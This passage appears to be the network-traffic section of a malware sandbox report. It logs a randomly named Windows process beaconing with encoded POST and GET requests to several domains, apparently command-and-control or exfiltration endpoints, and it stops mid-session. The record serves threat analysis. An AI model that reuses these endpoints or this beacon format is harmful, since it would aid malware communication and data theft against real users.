                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.infovea.tech
                                                                    Origin: http://www.infovea.tech
                                                                    Referer: http://www.infovea.tech/s1ai/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 212
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Ascii: -0-L9xY=DcGiBOAeNi3G3xSYkwNaVA4dm8IFsEBWsSxUVReyEhSbngOHcs6K1Ji/7d3FHXVHCsMErnA2D5Serr84lgEes4h48TRicB+Y0BTbJB6NEjIsu3o6Ikj0jZ8ApkarxflFjCp/DjseRPjJBu1G75ZsE3DWaaZEKvxE7GPxfnge/zUjwr04cELf1MRk6WK1RSzb2++tZRJJbRb5
                                                                    Jan 10, 2025 09:13:10.284492016 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                    content-length: 0
                                                                    connection: close


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    26 | 192.168.2.6 | 50012 | 76.223.67.189 | 80 | 6728 | C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 10, 2025 09:13:12.390806913 CET | 799 | OUT | POST /s1ai/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.infovea.tech
                                                                    Origin: http://www.infovea.tech
                                                                    Referer: http://www.infovea.tech/s1ai/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 236
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Ascii: -0-L9xY=DcGiBOAeNi3G4wiYmT1aCw4ej8IF1UBSsSNUVU+iEz2bnB+Hdt6K2Ji/z93AI3VICsQirm82D96erp04kWMdjIh6lDRgDx+Y0BTbJBu3EjQsun46IFj1p58D+Uar1flBjCpBDmF1RNLJBthG7oZvK3CfU6YrOKANjVWSbFwJpDwbxdpiA3L8ncxm6USHRyzx0+GtLGFuUl+aaESNblw3j0k8P8URLN3v/A==
                                                                    Jan 10, 2025 09:13:12.831665993 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                    content-length: 0
                                                                    connection: close


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    27 | 192.168.2.6 | 50013 | 76.223.67.189 | 80 | 6728 | C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 10, 2025 09:13:14.945652962 CET | 1812 | OUT | POST /s1ai/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.infovea.tech
                                                                    Origin: http://www.infovea.tech
                                                                    Referer: http://www.infovea.tech/s1ai/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1248
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Ascii: -0-L9xY= [TRUNCATED]
                                                                    Jan 10, 2025 09:13:15.395951986 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                    content-length: 0
                                                                    connection: close


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    28 | 192.168.2.6 | 50014 | 76.223.67.189 | 80 | 6728 | C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 10, 2025 09:13:17.642287016 CET | 519 | OUT | GET /s1ai/?Mn=PdO8wZnxGnZX&-0-L9xY=OeuCC4AAQS2w6DeZmykOBUICy+Ibjx9D3RgTSDmLGyfpyTmRf/Og24qPiqLVP2x5Sr9ji300Ieqror0vpzcssLhcoQBQDTaflTjWEmv0cWcvwj5EA3qCrdMAiiyroqZ2qSN6N28= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.infovea.tech
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Jan 10, 2025 09:13:18.081914902 CET | 396 | IN | HTTP/1.1 200 OK
                                                                    content-type: text/html
                                                                    date: Fri, 10 Jan 2025 08:13:18 GMT
                                                                    content-length: 275
                                                                    connection: close
                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Mn=PdO8wZnxGnZX&-0-L9xY=OeuCC4AAQS2w6DeZmykOBUICy+Ibjx9D3RgTSDmLGyfpyTmRf/Og24qPiqLVP2x5Sr9ji300Ieqror0vpzcssLhcoQBQDTaflTjWEmv0cWcvwj5EA3qCrdMAiiyroqZ2qSN6N28="}</script></head></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    29 | 192.168.2.6 | 50015 | 103.247.11.204 | 80 | 6728 | C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 10, 2025 09:13:24.045180082 CET | 775 | OUT | POST /h4q2/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.itcomp.store
                                                                    Origin: http://www.itcomp.store
                                                                    Referer: http://www.itcomp.store/h4q2/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 212
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Ascii: -0-L9xY=D5+2pLFZx61Su9VQmSSxwhhiM51Vc3g6ZqLOzj6QbDJ+Z9A3N/7oLhY3XXJA8EKNKgt+ttA3/6Yadp8W/qgHF2voV0qQyGlI2z3fDa/S06bZphRgb7vywnPoG0/wE0cfw/y0r3Qij3Tyf+aU2QYCCPk/EPmZ7Y/whRMD8iQwiLVhlUGsFG39P0cd2MsNkDOMHWRbEscwWb+T
                                                                    Jan 10, 2025 09:13:24.945547104 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Fri, 10 Jan 2025 08:13:23 GMT
                                                                    Server: Apache
                                                                    Content-Length: 315
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    30 | 192.168.2.6 | 50016 | 103.247.11.204 | 80 | 6728 | C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 10, 2025 09:13:26.592706919 CET | 799 | OUT | POST /h4q2/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.itcomp.store
                                                                    Origin: http://www.itcomp.store
                                                                    Referer: http://www.itcomp.store/h4q2/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 236
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Ascii: -0-L9xY=D5+2pLFZx61SucFQh0ax1BhlQp1VFng+ZqHOzhW5b15+aYE3M9ToIhY3f3JFhUKGKghctss3/+wadoMW/ZIGEmvqUEqSv2lI2z3fDbe906DZpVVgJuPtznPpQE/wA0dYw/yGr2MMjxPyf9OUzS8NIPl6Ovnx69a1pw5M4z4k1JFWpCb2Z13edk8f2O0/kjOmFWpbW7QXZvbwNIpVQWUVFmkheEWiN4IFTA==
                                                                    Jan 10, 2025 09:13:27.495505095 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Fri, 10 Jan 2025 08:13:26 GMT
                                                                    Server: Apache
                                                                    Content-Length: 315
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    31 | 192.168.2.6 | 50017 | 103.247.11.204 | 80 | 6728 | C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 10, 2025 09:13:29.329629898 CET | 1812 | OUT | POST /h4q2/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.itcomp.store
                                                                    Origin: http://www.itcomp.store
                                                                    Referer: http://www.itcomp.store/h4q2/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1248
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Ascii: -0-L9xY= [TRUNCATED]
                                                                    Jan 10, 2025 09:13:30.413875103 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Fri, 10 Jan 2025 08:13:28 GMT
                                                                    Server: Apache
                                                                    Content-Length: 315
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    32 | 192.168.2.6 | 50018 | 103.247.11.204 | 80 | 6728 | C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 10, 2025 09:13:31.974636078 CET | 519 | OUT | GET /h4q2/?-0-L9xY=O7WWq9F6w4cGi/1xuyqA6hNbNZ9TTDUhOaeE1BmWFQlzRYYNMfDiNCsBOldRtXetUX45l8haztomC58f/ZN8Kn/la1SkzkcShgzFC6zVssbmmh1rF7ne1GqBaj3+VQkehMq71iQ=&Mn=PdO8wZnxGnZX HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.itcomp.store
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Jan 10, 2025 09:13:32.875283957 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Fri, 10 Jan 2025 08:13:31 GMT
                                                                    Server: Apache
                                                                    Content-Length: 315
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    33 | 192.168.2.6 | 50019 | 136.243.64.147 | 80 | 6728 | C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 10, 2025 09:13:38.306579113 CET | 802 | OUT | POST /oqj2/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.100millionjobs.africa
                                                                    Origin: http://www.100millionjobs.africa
                                                                    Referer: http://www.100millionjobs.africa/oqj2/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 212
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Ascii: -0-L9xY=gi/4eU6tR7o8wQ450JBnyGWjGss60Zn82nGSMleMJrVNzPuMI1BSZLTS7QaM0spD4DaF2nS92fAJKwC3y+QRse/1mYn2NEtYPvX6KLCJbViY3mEfOjnOPwRN+ynQaKa2RyZCQfAk8ysJOOsy6Z9tElI3H+2NQTjd6j6wmaPP1HLiAa26Z/9GHgESaLASdubOAb4TQU15a0tF
                                                                    Jan 10, 2025 09:13:38.849394083 CET | 493 | IN | HTTP/1.1 302 Found
                                                                    Date: Fri, 10 Jan 2025 08:13:38 GMT
                                                                    Server: Apache
                                                                    Location: http://maximumgroup.co.za/oqj2/
                                                                    Content-Length: 290
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/oqj2/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    34 | 192.168.2.6 | 50020 | 136.243.64.147 | 80 | 6728 | C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 10, 2025 09:13:40.856575966 CET | 826 | OUT | POST /oqj2/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.100millionjobs.africa
                                                                    Origin: http://www.100millionjobs.africa
                                                                    Referer: http://www.100millionjobs.africa/oqj2/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 236
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Ascii: -0-L9xY=gi/4eU6tR7o8wxI52oBn7GWgJMs695nn2nCSMnymJ9FNzu+MagtSXrTS1waJr8pI4DGr2mu92fEJK0O3yJ8WuO+Tv4n0DktYPvX6KPrebVqY2VcfcRPBRARM2SnQQqayRyZkQcEa80wJOKgy7I9iKlIxYO3yWhqB+gfx4YP3skT0BsrgFM9lVwkQaJYgdObkCbATCD5eVAImLorDxUyygJZaCEjGf6NwEQ==
                                                                    Jan 10, 2025 09:13:41.488694906 CET | 493 | IN | HTTP/1.1 302 Found
                                                                    Date: Fri, 10 Jan 2025 08:13:41 GMT
                                                                    Server: Apache
                                                                    Location: http://maximumgroup.co.za/oqj2/
                                                                    Content-Length: 290
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/oqj2/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    35 | 192.168.2.6 | 50021 | 136.243.64.147 | 80 | 6728 | C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 10, 2025 09:13:43.439448118 CET | 1839 | OUT | POST /oqj2/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.100millionjobs.africa
                                                                    Origin: http://www.100millionjobs.africa
                                                                    Referer: http://www.100millionjobs.africa/oqj2/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1248
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Ascii: -0-L9xY=gi/4eU6tR7o8wxI52oBn7GWgJMs695nn2nCSMnymJ9NNz+iMIX5SUrTS9QaIr8pV4Dev2miD2ZYJMXG3w8IWnO+Tt4npNEsaPrzmKLHebVqY2SkfeDnBTARN+ynEaKaeRyBaQfpv9CAJAOMy2aFiClIzbO3qWh2o+gzX4ZrdsmP0MZavee9sXhUPG4YYeeraDJcyCAIjahUkO+3A7Fe1ioJFdhKTSqcBGKThZT4sx+IEuWouTWAMfbJQbRvlDWr6DUb1zqTtea2cwpG9hzE2Izog9q/h+xBbFpnsLDBvcRdlvsBGG1/0E5UvcA4uSZTTS79sp5NS2dTTPiBU4kpq198eBUcTljFIkXNAIBQPbjZV3IpteyPTVzknJS+fAppp9Ws/cP4Ipx4vQVOoFiMbo1mnR7M0kOyZuOFffKQCJte4mk5GDdQNFkKUXOBulko4c7g7ZcCN2ouR3OqzRKiW9ifNhIbvEBr9mKidcn9glVzSVCTbBj+GiMwEs7YV6sT3mwygKr4FNmkEsv4X/cA7RbNkFcayAEnekefpZrcOt2yMakAoGAW1Ui/K2DuRISSSEVNnmKhRKLXjuJdZrGZgL34dtF64IpUwufhlN+buc+3w49vk45kHEOcxUaY/m/Xt+hd2uRYXUMzFoAdi6knTnYf9AZ3f3/88ri71MTK5hl0n6jo01TmhtE+xOgitScJPniZ5Cemg9rKLyemAiq2GFTnEkLtHDssSumEx1tXkDfNfLazcfDO/+D9xhsDYUGt8bu9YmX+KyvD7J0Vo4BF46SuqBzYwoHbm2bTX49iyGo1LzZDDZ1jXnr22/scGyVePVGo/KqKY+s/zdrKcPdLhJfTjNHft0fGzmGlKvWtO+OxEaxSv7bwoiAxQgSYgVbxjLgM+O9bQAGUPDdpZyfxmDwd/p5Qdw3bdPWmY3hsIFpQwvpSiJQyWiNeOlmHIBxesgcoNRbV3pzWSISA/prTBTRwsdAlA3M/IOYpvtd4nwdYj [TRUNCATED]
                                                                    Jan 10, 2025 09:13:44.061045885 CET  493  IN  HTTP/1.1 302 Found
                                                                    Date: Fri, 10 Jan 2025 08:13:43 GMT
                                                                    Server: Apache
                                                                    Location: http://maximumgroup.co.za/oqj2/
                                                                    Content-Length: 290
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 6f 71 6a 32 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 30 30 6d 69 6c 6c 69 6f 6e 6a 6f 62 73 2e 61 66 72 69 63 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/oqj2/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                    36          192.168.2.6  50022        136.243.64.147  80                6728  C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                    Jan 10, 2025 09:13:45.980811119 CET  528  OUT  GET /oqj2/?Mn=PdO8wZnxGnZX&-0-L9xY=tgXYdkLIQp5X1DQK2Lc0zTS8fsB8z/iBngGKB1idJuR6ndicPlBASrfeljqr7NFo/3ruzmmh7usSa3Ts+9UehuGvsJDxVXRAIIPhWP6NCAav+HV8QwX1dk0t+FHMIvusdCtCdZ0= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.100millionjobs.africa
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Jan 10, 2025 09:13:46.615577936 CET  819  IN  HTTP/1.1 302 Found
                                                                    Date: Fri, 10 Jan 2025 08:13:46 GMT
                                                                    Server: Apache
                                                                    Location: http://maximumgroup.co.za/oqj2/?Mn=PdO8wZnxGnZX&-0-L9xY=tgXYdkLIQp5X1DQK2Lc0zTS8fsB8z/iBngGKB1idJuR6ndicPlBASrfeljqr7NFo/3ruzmmh7usSa3Ts+9UehuGvsJDxVXRAIIPhWP6NCAav+HV8QwX1dk0t+FHMIvusdCtCdZ0=
                                                                    Content-Length: 455
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 6f 71 6a 32 2f 3f 4d 6e 3d 50 64 4f 38 77 5a 6e 78 47 6e 5a 58 26 61 6d 70 3b 2d 30 2d 4c 39 78 59 3d 74 67 58 59 64 6b 4c 49 51 70 35 58 31 44 51 4b 32 4c 63 30 7a 54 53 38 66 73 42 38 7a 2f 69 42 6e 67 47 4b 42 31 69 64 4a 75 52 36 6e 64 69 63 50 6c 42 41 53 72 66 65 6c 6a 71 72 37 4e 46 6f 2f 33 72 75 7a 6d 6d 68 37 75 73 53 61 33 54 73 2b 39 55 65 68 75 47 76 73 4a 44 78 56 58 52 41 49 49 50 68 57 50 36 4e 43 41 61 76 2b 48 56 38 51 77 58 31 64 6b 30 74 2b 46 48 4d 49 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/oqj2/?Mn=PdO8wZnxGnZX&amp;-0-L9xY=tgXYdkLIQp5X1DQK2Lc0zTS8fsB8z/iBngGKB1idJuR6ndicPlBASrfeljqr7NFo/3ruzmmh7usSa3Ts+9UehuGvsJDxVXRAIIPhWP6NCAav+HV8QwX1dk0t+FHMIvusdCtCdZ0=">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                    37          192.168.2.6  50023        172.67.148.216  80                6728  C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                    Jan 10, 2025 09:13:59.928872108 CET  793  OUT  POST /ufm5/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.overlayoasis.quest
                                                                    Origin: http://www.overlayoasis.quest
                                                                    Referer: http://www.overlayoasis.quest/ufm5/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 212
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
